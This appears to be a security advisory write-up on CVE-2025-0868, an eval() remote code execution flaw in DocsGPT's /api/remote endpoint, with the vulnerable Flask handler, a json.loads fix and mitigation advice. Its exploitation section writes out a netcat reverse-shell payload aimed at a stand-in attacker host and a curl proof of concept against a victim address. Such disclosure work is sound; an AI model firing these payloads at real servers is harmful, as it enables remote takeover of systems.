A critical vulnerability, CVE-2025-0868, has been found in DocsGPT, an open-source documentation assistant powered by LLMs. The flaw allows an unauthenticated attacker to run arbitrary Python code remotely through the /api/remote endpoint. The bug affects DocsGPT versions 0.8.1 through 0.12.0. It happens because the developers used Python's dangerous eval() function while parsing JSON, opening a straight path for attackers to take over affected servers.
- Affected versions: DocsGPT 0.8.1 ≤ version ≤ 0.12.0
- Vulnerable component: /api/remote endpoint — improper JSON handling with eval()
## What Happened?
The /api/remote endpoint in DocsGPT is supposed to accept JSON commands for processing. But instead of using a safe parser on the incoming data, the code passes it to Python's eval() function. As a result, any data sent to the endpoint is executed as Python code, including malicious commands.
## Why is eval() dangerous?
eval() will run whatever string you give it as real Python code. This is a well-known risk: if user input is passed to eval() without safety checks, you’re basically handing attackers the keys to your server.
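To see the difference concretely, here is a minimal standard-library sketch contrasting eval() with a safe JSON parser (the example string is illustrative):

```python
import json

# Attacker-controlled string: valid Python, but not valid JSON
user_input = "__import__('os').getcwd()"

# eval() executes the string as code; this call really runs os.getcwd()
print(eval(user_input))

# json.loads() treats input strictly as data and rejects anything else
try:
    json.loads(user_input)
except json.JSONDecodeError:
    print("rejected: not valid JSON")
```

The same string that eval() happily executes is rejected by json.loads() as malformed data, which is exactly the behavior a JSON endpoint needs.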
Let’s take a look at a simplified version of the vulnerable code:

```python
# Vulnerable code at the /api/remote handler
from flask import Flask, request

app = Flask(__name__)

@app.route('/api/remote', methods=['POST'])
def remote():
    data = request.data.decode('utf-8')
    # THIS IS THE BUG
    payload = eval(data)  # <-- accepts and executes any code!
    # do something with payload...
    return "OK"
```
## What’s wrong here?
If you send a POST request to /api/remote, the body is evaluated as raw Python. For example, the payload

```python
{__import__('os').system('whoami'): None}
```

makes the server run the whoami command: the dict key is a bare expression, so eval() executes it while building the dict.
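You can verify this key-execution behavior locally with a harmless stand-in payload (using getpid() instead of a shell command):

```python
import os

# Benign stand-in for the attack payload: the dict key is an expression,
# so eval() executes it while building the dict
body = "{__import__('os').getpid(): None}"
result = eval(body)
print(os.getpid() in result)  # True: the key expression really ran
```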
## What should have been used instead?
Safe JSON parsing, like:

```python
import json

payload = json.loads(data)
```
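A slightly fuller sketch of safe handling (parse_remote_payload is a hypothetical helper for illustration, not DocsGPT's actual fix) that also validates the payload shape:

```python
import json

def parse_remote_payload(raw: bytes) -> dict:
    """Parse an /api/remote body without ever executing it."""
    try:
        # json.loads never executes its input; bad data raises instead
        payload = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError(f"invalid JSON payload: {exc}") from exc
    if not isinstance(payload, dict):
        raise ValueError("expected a JSON object")
    return payload
```

With this approach, the exploit strings shown above are simply rejected as malformed JSON instead of being executed.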
---
## Reference
Original Disclosure, Project Issue Trackers, and Details:
- DocsGPT GitHub Repository
- Security Advisory on GitHub
- Python Eval Security Risks
---
## Exploitation: Step-by-Step
Here’s how easy it is for an attacker to exploit the bug:
1. Find a vulnerable server:
   Check whether /api/remote exists and accepts POST requests.

2. Prepare the malicious payload:
   The attacker crafts data that runs Python code when eval()'d, for example to open a reverse shell:

```python
{__import__("os").system("nc attacker.com 4444 -e /bin/bash"): None}
```

3. Send the payload:
   A harmless proof of concept instead creates a marker file:

```python
{__import__("os").system("touch /tmp/hacked"): None}
```

```bash
curl -X POST http://victim-ip:5000/api/remote -d "{__import__(\"os\").system(\"touch /tmp/hacked\"): None}"
```

4. Result:
   The vulnerable server executes the code and creates the /tmp/hacked file, proving code execution.
## Mitigation

- **Update immediately:** check the releases page and upgrade past 0.12.0 to the latest non-vulnerable version.
- **Patch the code:** replace the eval() call with safe JSON parsing:

```python
payload = json.loads(data)
```

- **Shield the endpoint:** if you cannot patch, immediately restrict access to /api/remote using firewalls or API gateway rules.

---

## Conclusion

CVE-2025-0868 is a textbook example of why eval() must never be used on user input. Attackers can trivially take over DocsGPT servers running versions 0.8.1 through 0.12.0. The fixes are simple: update, patch, and always validate and safely handle input.
---
Stay safe!
For more technical write-ups and updates, watch the official DocsGPT security advisories.
---
*This post is original and summarizes current knowledge at the time of writing. Spread the word to your team!*
## Timeline
Published on: 02/20/2025 12:15:10 UTC